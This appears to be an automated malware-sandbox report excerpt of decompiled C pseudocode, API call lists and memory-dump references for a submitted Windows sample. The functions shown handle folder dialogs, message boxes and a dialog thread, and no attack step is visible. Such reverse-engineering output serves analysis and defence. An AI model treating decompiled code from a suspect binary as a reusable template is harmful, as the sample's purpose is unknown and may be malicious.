                                                                                                                                                                                                    0x00fd35a7
                                                                                                                                                                                                    0x00fd35ad
                                                                                                                                                                                                    0x00fd35b3
                                                                                                                                                                                                    0x00fd35b8
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd35b8
                                                                                                                                                                                                    0x00fd3586
                                                                                                                                                                                                    0x00fd3588
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd3590
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd3590
                                                                                                                                                                                                    0x00fd3524
                                                                                                                                                                                                    0x00fd3535
                                                                                                                                                                                                    0x00fd3541
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd3549
                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • TerminateThread.KERNEL32(00000000), ref: 00FD3535
                                                                                                                                                                                                    • EndDialog.USER32(?,?), ref: 00FD3541
                                                                                                                                                                                                    • ResetEvent.KERNEL32 ref: 00FD355F
                                                                                                                                                                                                    • SetEvent.KERNEL32(00FD1140,00000000,00000020,00000004), ref: 00FD3590
                                                                                                                                                                                                    • GetDesktopWindow.USER32 ref: 00FD35C7
                                                                                                                                                                                                    • GetDlgItem.USER32(?,0000083B), ref: 00FD35F1
                                                                                                                                                                                                    • SendMessageA.USER32(00000000), ref: 00FD35F8
                                                                                                                                                                                                    • GetDlgItem.USER32(?,0000083B), ref: 00FD3610
                                                                                                                                                                                                    • SendMessageA.USER32(00000000), ref: 00FD3617
                                                                                                                                                                                                    • SetWindowTextA.USER32(?,nst0dum), ref: 00FD3623
                                                                                                                                                                                                    • CreateThread.KERNEL32 ref: 00FD3637
                                                                                                                                                                                                    • EndDialog.USER32(?,00000000), ref: 00FD3671
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.378203411.0000000000FD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000003.00000002.378192646.0000000000FD0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378223706.0000000000FD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378238170.0000000000FDA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378238170.0000000000FDC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_fd0000_plvy67MJ29.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: DialogEventItemMessageSendThreadWindow$CreateDesktopResetTerminateText
                                                                                                                                                                                                    • String ID: nst0dum
                                                                                                                                                                                                    • API String ID: 2406144884-432003757
                                                                                                                                                                                                    • Opcode ID: 99fbb03ff233ddb8f9af7adec5c3786944c8e031aa6d5ffe680d9ec59929e628
                                                                                                                                                                                                    • Instruction ID: 541e6a44d188d6a80ab3aac21241782a2bcc62d8316eeb16bf1ec8b03e5c7002
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 99fbb03ff233ddb8f9af7adec5c3786944c8e031aa6d5ffe680d9ec59929e628
                                                                                                                                                                                                    • Instruction Fuzzy Hash: A731C271201209BBD7201B35EC0DF2A3B6BE785B51F1C4417F702913A0CB75DA01FA5A
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 50%
                                                                                                                                                                                                    			E00FD4224(char __ecx) {
                                                                                                                                                                                                    				char* _v8;
                                                                                                                                                                                                    				_Unknown_base(*)()* _v12;
                                                                                                                                                                                                    				_Unknown_base(*)()* _v16;
                                                                                                                                                                                                    				_Unknown_base(*)()* _v20;
                                                                                                                                                                                                    				char* _v28;
                                                                                                                                                                                                    				intOrPtr _v32;
                                                                                                                                                                                                    				intOrPtr _v36;
                                                                                                                                                                                                    				intOrPtr _v40;
                                                                                                                                                                                                    				char _v44;
                                                                                                                                                                                                    				char _v48;
                                                                                                                                                                                                    				char _v52;
                                                                                                                                                                                                    				_Unknown_base(*)()* _t26;
                                                                                                                                                                                                    				_Unknown_base(*)()* _t28;
                                                                                                                                                                                                    				_Unknown_base(*)()* _t29;
                                                                                                                                                                                                    				_Unknown_base(*)()* _t32;
                                                                                                                                                                                                    				char _t42;
                                                                                                                                                                                                    				char* _t44;
                                                                                                                                                                                                    				char* _t61;
                                                                                                                                                                                                    				void* _t63;
                                                                                                                                                                                                    				char* _t65;
                                                                                                                                                                                                    				struct HINSTANCE__* _t66;
                                                                                                                                                                                                    				char _t67;
                                                                                                                                                                                                    				void* _t71;
                                                                                                                                                                                                    				char _t76;
                                                                                                                                                                                                    				intOrPtr _t85;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t67 = __ecx;
                                                                                                                                                                                                    				_t66 = LoadLibraryA("SHELL32.DLL");
                                                                                                                                                                                                    				if(_t66 == 0) {
                                                                                                                                                                                                    					_t63 = 0x4c2;
                                                                                                                                                                                                    					L22:
                                                                                                                                                                                                    					E00FD44B9(_t67, _t63, 0, 0, 0x10, 0);
                                                                                                                                                                                                    					return 0;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t26 = GetProcAddress(_t66, "SHBrowseForFolder");
                                                                                                                                                                                                    				_v12 = _t26;
                                                                                                                                                                                                    				if(_t26 == 0) {
                                                                                                                                                                                                    					L20:
                                                                                                                                                                                                    					FreeLibrary(_t66);
                                                                                                                                                                                                    					_t63 = 0x4c1;
                                                                                                                                                                                                    					goto L22;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t28 = GetProcAddress(_t66, 0xc3);
                                                                                                                                                                                                    				_v20 = _t28;
                                                                                                                                                                                                    				if(_t28 == 0) {
                                                                                                                                                                                                    					goto L20;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t29 = GetProcAddress(_t66, "SHGetPathFromIDList");
                                                                                                                                                                                                    				_v16 = _t29;
                                                                                                                                                                                                    				if(_t29 == 0) {
                                                                                                                                                                                                    					goto L20;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t76 =  *0xfd88c0; // 0x0
                                                                                                                                                                                                    				if(_t76 != 0) {
                                                                                                                                                                                                    					L10:
                                                                                                                                                                                                    					 *0xfd87a0 = 0;
                                                                                                                                                                                                    					_v52 = _t67;
                                                                                                                                                                                                    					_v48 = 0;
                                                                                                                                                                                                    					_v44 = 0;
                                                                                                                                                                                                    					_v40 = 0xfd8598;
                                                                                                                                                                                                    					_v36 = 1;
                                                                                                                                                                                                    					_v32 = E00FD4200;
                                                                                                                                                                                                    					_v28 = 0xfd88c0;
                                                                                                                                                                                                    					 *0xfda288( &_v52);
                                                                                                                                                                                                    					_t32 =  *_v12();
                                                                                                                                                                                                    					if(_t71 != _t71) {
                                                                                                                                                                                                    						asm("int 0x29");
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					_v12 = _t32;
                                                                                                                                                                                                    					if(_t32 != 0) {
                                                                                                                                                                                                    						 *0xfda288(_t32, 0xfd88c0);
                                                                                                                                                                                                    						 *_v16();
                                                                                                                                                                                                    						if(_t71 != _t71) {
                                                                                                                                                                                                    							asm("int 0x29");
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						if( *0xfd88c0 != 0) {
                                                                                                                                                                                                    							E00FD1680(0xfd87a0, 0x104, 0xfd88c0);
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						 *0xfda288(_v12);
                                                                                                                                                                                                    						 *_v20();
                                                                                                                                                                                                    						if(_t71 != _t71) {
                                                                                                                                                                                                    							asm("int 0x29");
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					FreeLibrary(_t66);
                                                                                                                                                                                                    					_t85 =  *0xfd87a0; // 0x0
                                                                                                                                                                                                    					return 0 | _t85 != 0x00000000;
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					GetTempPathA(0x104, 0xfd88c0);
                                                                                                                                                                                                    					_t61 = 0xfd88c0;
                                                                                                                                                                                                    					_t4 =  &(_t61[1]); // 0xfd88c1
                                                                                                                                                                                                    					_t65 = _t4;
                                                                                                                                                                                                    					do {
                                                                                                                                                                                                    						_t42 =  *_t61;
                                                                                                                                                                                                    						_t61 =  &(_t61[1]);
                                                                                                                                                                                                    					} while (_t42 != 0);
                                                                                                                                                                                                    					_t5 = _t61 - _t65 + 0xfd88c0; // 0x1fb1181
                                                                                                                                                                                                    					_t44 = CharPrevA(0xfd88c0, _t5);
                                                                                                                                                                                                    					_v8 = _t44;
                                                                                                                                                                                                    					if( *_t44 == 0x5c &&  *(CharPrevA(0xfd88c0, _t44)) != 0x3a) {
                                                                                                                                                                                                    						 *_v8 = 0;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					goto L10;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    			}




























                                                                                                                                                                                                    0x00fd4234
                                                                                                                                                                                                    0x00fd423c
                                                                                                                                                                                                    0x00fd4240
                                                                                                                                                                                                    0x00fd43b2
                                                                                                                                                                                                    0x00fd43b7
                                                                                                                                                                                                    0x00fd43c0
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd43c5
                                                                                                                                                                                                    0x00fd424c
                                                                                                                                                                                                    0x00fd4252
                                                                                                                                                                                                    0x00fd4257
                                                                                                                                                                                                    0x00fd43a4
                                                                                                                                                                                                    0x00fd43a5
                                                                                                                                                                                                    0x00fd43ab
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd43ab
                                                                                                                                                                                                    0x00fd4263
                                                                                                                                                                                                    0x00fd4269
                                                                                                                                                                                                    0x00fd426e
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd427a
                                                                                                                                                                                                    0x00fd4280
                                                                                                                                                                                                    0x00fd4285
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd428d
                                                                                                                                                                                                    0x00fd4293
                                                                                                                                                                                                    0x00fd42e6
                                                                                                                                                                                                    0x00fd42e9
                                                                                                                                                                                                    0x00fd42ef
                                                                                                                                                                                                    0x00fd42f4
                                                                                                                                                                                                    0x00fd42f7
                                                                                                                                                                                                    0x00fd4300
                                                                                                                                                                                                    0x00fd4307
                                                                                                                                                                                                    0x00fd430e
                                                                                                                                                                                                    0x00fd4315
                                                                                                                                                                                                    0x00fd431c
                                                                                                                                                                                                    0x00fd4322
                                                                                                                                                                                                    0x00fd4326
                                                                                                                                                                                                    0x00fd432d
                                                                                                                                                                                                    0x00fd432d
                                                                                                                                                                                                    0x00fd432f
                                                                                                                                                                                                    0x00fd4334
                                                                                                                                                                                                    0x00fd4343
                                                                                                                                                                                                    0x00fd4349
                                                                                                                                                                                                    0x00fd434d
                                                                                                                                                                                                    0x00fd4354
                                                                                                                                                                                                    0x00fd4354
                                                                                                                                                                                                    0x00fd435d
                                                                                                                                                                                                    0x00fd436e
                                                                                                                                                                                                    0x00fd436e
                                                                                                                                                                                                    0x00fd437d
                                                                                                                                                                                                    0x00fd4383
                                                                                                                                                                                                    0x00fd4387
                                                                                                                                                                                                    0x00fd438e
                                                                                                                                                                                                    0x00fd438e
                                                                                                                                                                                                    0x00fd4387
                                                                                                                                                                                                    0x00fd4391
                                                                                                                                                                                                    0x00fd4399
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd4295
                                                                                                                                                                                                    0x00fd429f
                                                                                                                                                                                                    0x00fd42a5
                                                                                                                                                                                                    0x00fd42aa
                                                                                                                                                                                                    0x00fd42aa
                                                                                                                                                                                                    0x00fd42ad
                                                                                                                                                                                                    0x00fd42ad
                                                                                                                                                                                                    0x00fd42af
                                                                                                                                                                                                    0x00fd42b0
                                                                                                                                                                                                    0x00fd42b6
                                                                                                                                                                                                    0x00fd42c2
                                                                                                                                                                                                    0x00fd42c8
                                                                                                                                                                                                    0x00fd42ce
                                                                                                                                                                                                    0x00fd42e4
                                                                                                                                                                                                    0x00fd42e4
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd42ce

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(SHELL32.DLL,?,?,00000001), ref: 00FD4236
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SHBrowseForFolder), ref: 00FD424C
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,000000C3), ref: 00FD4263
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SHGetPathFromIDList), ref: 00FD427A
                                                                                                                                                                                                    • GetTempPathA.KERNEL32(00000104,00FD88C0,?,00000001), ref: 00FD429F
                                                                                                                                                                                                    • CharPrevA.USER32(00FD88C0,01FB1181,?,00000001), ref: 00FD42C2
                                                                                                                                                                                                    • CharPrevA.USER32(00FD88C0,00000000,?,00000001), ref: 00FD42D6
                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 00FD4391
                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 00FD43A5
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.378203411.0000000000FD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000003.00000002.378192646.0000000000FD0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378223706.0000000000FD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378238170.0000000000FDA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378238170.0000000000FDC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_fd0000_plvy67MJ29.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AddressLibraryProc$CharFreePrev$LoadPathTemp
                                                                                                                                                                                                    • String ID: SHBrowseForFolder$SHELL32.DLL$SHGetPathFromIDList
                                                                                                                                                                                                    • API String ID: 1865808269-1731843650
                                                                                                                                                                                                    • Opcode ID: de9898d1189962cbb63ea6d862a3ea69b713adf07744be3642f0f317dcefccc1
                                                                                                                                                                                                    • Instruction ID: 39bbc5fca30e5d934062a54ff08425ca251baab9fef1a8c9b4ba1023a3dbfbfe
                                                                                                                                                                                                    • Opcode Fuzzy Hash: de9898d1189962cbb63ea6d862a3ea69b713adf07744be3642f0f317dcefccc1
                                                                                                                                                                                                    • Instruction Fuzzy Hash: BA41E174E01248AFD711AB74DC88A6E7BB7EB45394F0C016BE941A3391CB759C02FB66
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 94%
                                                                                                                                                                                                    			E00FD44B9(struct HWND__* __ecx, int __edx, intOrPtr* _a4, void* _a8, int _a12, signed int _a16) {
                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                    				char _v64;
                                                                                                                                                                                                    				char _v576;
                                                                                                                                                                                                    				void* _v580;
                                                                                                                                                                                                    				struct HWND__* _v584;
                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                    				signed int _t34;
                                                                                                                                                                                                    				void* _t37;
                                                                                                                                                                                                    				signed int _t39;
                                                                                                                                                                                                    				intOrPtr _t43;
                                                                                                                                                                                                    				signed int _t44;
                                                                                                                                                                                                    				signed int _t49;
                                                                                                                                                                                                    				signed int _t52;
                                                                                                                                                                                                    				void* _t54;
                                                                                                                                                                                                    				intOrPtr _t55;
                                                                                                                                                                                                    				intOrPtr _t58;
                                                                                                                                                                                                    				intOrPtr _t59;
                                                                                                                                                                                                    				int _t64;
                                                                                                                                                                                                    				void* _t66;
                                                                                                                                                                                                    				intOrPtr* _t67;
                                                                                                                                                                                                    				signed int _t69;
                                                                                                                                                                                                    				intOrPtr* _t73;
                                                                                                                                                                                                    				intOrPtr* _t76;
                                                                                                                                                                                                    				intOrPtr* _t77;
                                                                                                                                                                                                    				void* _t80;
                                                                                                                                                                                                    				void* _t81;
                                                                                                                                                                                                    				void* _t82;
                                                                                                                                                                                                    				intOrPtr* _t84;
                                                                                                                                                                                                    				void* _t85;
                                                                                                                                                                                                    				signed int _t89;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t75 = __edx;
                                                                                                                                                                                                    				_t34 =  *0xfd8004; // 0x42de454f
                                                                                                                                                                                                    				_v8 = _t34 ^ _t89;
                                                                                                                                                                                                    				_v584 = __ecx;
                                                                                                                                                                                                    				_t83 = "LoadString() Error.  Could not load string resource.";
                                                                                                                                                                                                    				_t67 = _a4;
                                                                                                                                                                                                    				_t69 = 0xd;
                                                                                                                                                                                                    				_t37 = memcpy( &_v64, _t83, _t69 << 2);
                                                                                                                                                                                                    				_t80 = _t83 + _t69 + _t69;
                                                                                                                                                                                                    				_v580 = _t37;
                                                                                                                                                                                                    				asm("movsb");
                                                                                                                                                                                                    				if(( *0xfd8a38 & 0x00000001) != 0) {
                                                                                                                                                                                                    					_t39 = 1;
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					_v576 = 0;
                                                                                                                                                                                                    					LoadStringA( *0xfd9a3c, _t75,  &_v576, 0x200);
                                                                                                                                                                                                    					if(_v576 != 0) {
                                                                                                                                                                                                    						_t73 =  &_v576;
                                                                                                                                                                                                    						_t16 = _t73 + 1; // 0x1
                                                                                                                                                                                                    						_t75 = _t16;
                                                                                                                                                                                                    						do {
                                                                                                                                                                                                    							_t43 =  *_t73;
                                                                                                                                                                                                    							_t73 = _t73 + 1;
                                                                                                                                                                                                    						} while (_t43 != 0);
                                                                                                                                                                                                    						_t84 = _v580;
                                                                                                                                                                                                    						_t74 = _t73 - _t75;
                                                                                                                                                                                                    						if(_t84 == 0) {
                                                                                                                                                                                                    							if(_t67 == 0) {
                                                                                                                                                                                                    								_t27 = _t74 + 1; // 0x2
                                                                                                                                                                                                    								_t83 = _t27;
                                                                                                                                                                                                    								_t44 = LocalAlloc(0x40, _t83);
                                                                                                                                                                                                    								_t80 = _t44;
                                                                                                                                                                                                    								if(_t80 == 0) {
                                                                                                                                                                                                    									goto L6;
                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                    									_t75 = _t83;
                                                                                                                                                                                                    									_t74 = _t80;
                                                                                                                                                                                                    									E00FD1680(_t80, _t83,  &_v576);
                                                                                                                                                                                                    									goto L23;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                    								_t76 = _t67;
                                                                                                                                                                                                    								_t24 = _t76 + 1; // 0x1
                                                                                                                                                                                                    								_t85 = _t24;
                                                                                                                                                                                                    								do {
                                                                                                                                                                                                    									_t55 =  *_t76;
                                                                                                                                                                                                    									_t76 = _t76 + 1;
                                                                                                                                                                                                    								} while (_t55 != 0);
                                                                                                                                                                                                    								_t25 = _t76 - _t85 + 0x64; // 0x65
                                                                                                                                                                                                    								_t83 = _t25 + _t74;
                                                                                                                                                                                                    								_t44 = LocalAlloc(0x40, _t25 + _t74);
                                                                                                                                                                                                    								_t80 = _t44;
                                                                                                                                                                                                    								if(_t80 == 0) {
                                                                                                                                                                                                    									goto L6;
                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                    									E00FD171E(_t80, _t83,  &_v576, _t67);
                                                                                                                                                                                                    									goto L23;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                    							_t77 = _t67;
                                                                                                                                                                                                    							_t18 = _t77 + 1; // 0x1
                                                                                                                                                                                                    							_t81 = _t18;
                                                                                                                                                                                                    							do {
                                                                                                                                                                                                    								_t58 =  *_t77;
                                                                                                                                                                                                    								_t77 = _t77 + 1;
                                                                                                                                                                                                    							} while (_t58 != 0);
                                                                                                                                                                                                    							_t75 = _t77 - _t81;
                                                                                                                                                                                                    							_t82 = _t84 + 1;
                                                                                                                                                                                                    							do {
                                                                                                                                                                                                    								_t59 =  *_t84;
                                                                                                                                                                                                    								_t84 = _t84 + 1;
                                                                                                                                                                                                    							} while (_t59 != 0);
                                                                                                                                                                                                    							_t21 = _t74 + 0x64; // 0x65
                                                                                                                                                                                                    							_t83 = _t21 + _t84 - _t82 + _t75;
                                                                                                                                                                                                    							_t44 = LocalAlloc(0x40, _t21 + _t84 - _t82 + _t75);
                                                                                                                                                                                                    							_t80 = _t44;
                                                                                                                                                                                                    							if(_t80 == 0) {
                                                                                                                                                                                                    								goto L6;
                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                    								_push(_v580);
                                                                                                                                                                                                    								E00FD171E(_t80, _t83,  &_v576, _t67);
                                                                                                                                                                                                    								L23:
                                                                                                                                                                                                    								MessageBeep(_a12);
                                                                                                                                                                                                    								if(E00FD681F(_t67) == 0) {
                                                                                                                                                                                                    									L25:
                                                                                                                                                                                                    									_t49 = 0x10000;
                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                    									_t54 = E00FD67C9(_t74, _t74);
                                                                                                                                                                                                    									_t49 = 0x190000;
                                                                                                                                                                                                    									if(_t54 == 0) {
                                                                                                                                                                                                    										goto L25;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								_t52 = MessageBoxA(_v584, _t80, "nst0dum", _t49 | _a12 | _a16);
                                                                                                                                                                                                    								_t83 = _t52;
                                                                                                                                                                                                    								LocalFree(_t80);
                                                                                                                                                                                                    								_t39 = _t52;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                    						if(E00FD681F(_t67) == 0) {
                                                                                                                                                                                                    							L4:
                                                                                                                                                                                                    							_t64 = 0x10010;
                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                    							_t66 = E00FD67C9(0, 0);
                                                                                                                                                                                                    							_t64 = 0x190010;
                                                                                                                                                                                                    							if(_t66 == 0) {
                                                                                                                                                                                                    								goto L4;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t44 = MessageBoxA(_v584,  &_v64, "nst0dum", _t64);
                                                                                                                                                                                                    						L6:
                                                                                                                                                                                                    						_t39 = _t44 | 0xffffffff;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				return E00FD6CE0(_t39, _t67, _v8 ^ _t89, _t75, _t80, _t83);
                                                                                                                                                                                                    			}



































                                                                                                                                                                                                    0x00fd44b9
                                                                                                                                                                                                    0x00fd44c4
                                                                                                                                                                                                    0x00fd44cb
                                                                                                                                                                                                    0x00fd44d8
                                                                                                                                                                                                    0x00fd44e4
                                                                                                                                                                                                    0x00fd44eb
                                                                                                                                                                                                    0x00fd44ee
                                                                                                                                                                                                    0x00fd44ef
                                                                                                                                                                                                    0x00fd44ef
                                                                                                                                                                                                    0x00fd44f1
                                                                                                                                                                                                    0x00fd44f7
                                                                                                                                                                                                    0x00fd44f8
                                                                                                                                                                                                    0x00fd467b
                                                                                                                                                                                                    0x00fd44fe
                                                                                                                                                                                                    0x00fd4509
                                                                                                                                                                                                    0x00fd4518
                                                                                                                                                                                                    0x00fd4525
                                                                                                                                                                                                    0x00fd4562
                                                                                                                                                                                                    0x00fd4568
                                                                                                                                                                                                    0x00fd4568
                                                                                                                                                                                                    0x00fd456b
                                                                                                                                                                                                    0x00fd456b
                                                                                                                                                                                                    0x00fd456d
                                                                                                                                                                                                    0x00fd456e
                                                                                                                                                                                                    0x00fd4572
                                                                                                                                                                                                    0x00fd4578
                                                                                                                                                                                                    0x00fd457c
                                                                                                                                                                                                    0x00fd45cb
                                                                                                                                                                                                    0x00fd4607
                                                                                                                                                                                                    0x00fd4607
                                                                                                                                                                                                    0x00fd460d
                                                                                                                                                                                                    0x00fd4613
                                                                                                                                                                                                    0x00fd4617
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd461d
                                                                                                                                                                                                    0x00fd4623
                                                                                                                                                                                                    0x00fd4626
                                                                                                                                                                                                    0x00fd4628
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd4628
                                                                                                                                                                                                    0x00fd45cd
                                                                                                                                                                                                    0x00fd45cd
                                                                                                                                                                                                    0x00fd45cf
                                                                                                                                                                                                    0x00fd45cf
                                                                                                                                                                                                    0x00fd45d2
                                                                                                                                                                                                    0x00fd45d2
                                                                                                                                                                                                    0x00fd45d4
                                                                                                                                                                                                    0x00fd45d5
                                                                                                                                                                                                    0x00fd45db
                                                                                                                                                                                                    0x00fd45de
                                                                                                                                                                                                    0x00fd45e3
                                                                                                                                                                                                    0x00fd45e9
                                                                                                                                                                                                    0x00fd45ed
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd45f3
                                                                                                                                                                                                    0x00fd45fd
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd4602
                                                                                                                                                                                                    0x00fd45ed
                                                                                                                                                                                                    0x00fd457e
                                                                                                                                                                                                    0x00fd457e
                                                                                                                                                                                                    0x00fd4580
                                                                                                                                                                                                    0x00fd4580
                                                                                                                                                                                                    0x00fd4583
                                                                                                                                                                                                    0x00fd4583
                                                                                                                                                                                                    0x00fd4585
                                                                                                                                                                                                    0x00fd4586
                                                                                                                                                                                                    0x00fd458a
                                                                                                                                                                                                    0x00fd458c
                                                                                                                                                                                                    0x00fd458f
                                                                                                                                                                                                    0x00fd458f
                                                                                                                                                                                                    0x00fd4591
                                                                                                                                                                                                    0x00fd4592
                                                                                                                                                                                                    0x00fd459b
                                                                                                                                                                                                    0x00fd459e
                                                                                                                                                                                                    0x00fd45a3
                                                                                                                                                                                                    0x00fd45a9
                                                                                                                                                                                                    0x00fd45ad
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd45af
                                                                                                                                                                                                    0x00fd45af
                                                                                                                                                                                                    0x00fd45bf
                                                                                                                                                                                                    0x00fd462d
                                                                                                                                                                                                    0x00fd4630
                                                                                                                                                                                                    0x00fd463d
                                                                                                                                                                                                    0x00fd464e
                                                                                                                                                                                                    0x00fd464e
                                                                                                                                                                                                    0x00fd463f
                                                                                                                                                                                                    0x00fd4640
                                                                                                                                                                                                    0x00fd4647
                                                                                                                                                                                                    0x00fd464c
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd464c
                                                                                                                                                                                                    0x00fd4666
                                                                                                                                                                                                    0x00fd466d
                                                                                                                                                                                                    0x00fd466f
                                                                                                                                                                                                    0x00fd4675
                                                                                                                                                                                                    0x00fd4675
                                                                                                                                                                                                    0x00fd45ad
                                                                                                                                                                                                    0x00fd4527
                                                                                                                                                                                                    0x00fd452e
                                                                                                                                                                                                    0x00fd453f
                                                                                                                                                                                                    0x00fd453f
                                                                                                                                                                                                    0x00fd4530
                                                                                                                                                                                                    0x00fd4531
                                                                                                                                                                                                    0x00fd4538
                                                                                                                                                                                                    0x00fd453d
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd453d
                                                                                                                                                                                                    0x00fd4554
                                                                                                                                                                                                    0x00fd455a
                                                                                                                                                                                                    0x00fd455a
                                                                                                                                                                                                    0x00fd455a
                                                                                                                                                                                                    0x00fd4525
                                                                                                                                                                                                    0x00fd468c

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00FD4518
                                                                                                                                                                                                    • MessageBoxA.USER32(?,?,nst0dum,00010010), ref: 00FD4554
                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,00000065), ref: 00FD45A3
                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,00000065), ref: 00FD45E3
                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,00000002), ref: 00FD460D
                                                                                                                                                                                                    • MessageBeep.USER32(00000000), ref: 00FD4630
                                                                                                                                                                                                    • MessageBoxA.USER32(?,00000000,nst0dum,00000000), ref: 00FD4666
                                                                                                                                                                                                    • LocalFree.KERNEL32(00000000), ref: 00FD466F
                                                                                                                                                                                                      • Part of subcall function 00FD681F: GetVersionExA.KERNEL32(?,00000000,00000002), ref: 00FD686E
                                                                                                                                                                                                      • Part of subcall function 00FD681F: GetSystemMetrics.USER32(0000004A), ref: 00FD68A7
                                                                                                                                                                                                      • Part of subcall function 00FD681F: RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 00FD68CC
                                                                                                                                                                                                      • Part of subcall function 00FD681F: RegQueryValueExA.ADVAPI32(?,00FD1140,00000000,?,?,0000000C), ref: 00FD68F4
                                                                                                                                                                                                      • Part of subcall function 00FD681F: RegCloseKey.ADVAPI32(?), ref: 00FD6902
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.378203411.0000000000FD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000003.00000002.378192646.0000000000FD0000.00000002.00000001.01000000.00000006.sdmpDownload File
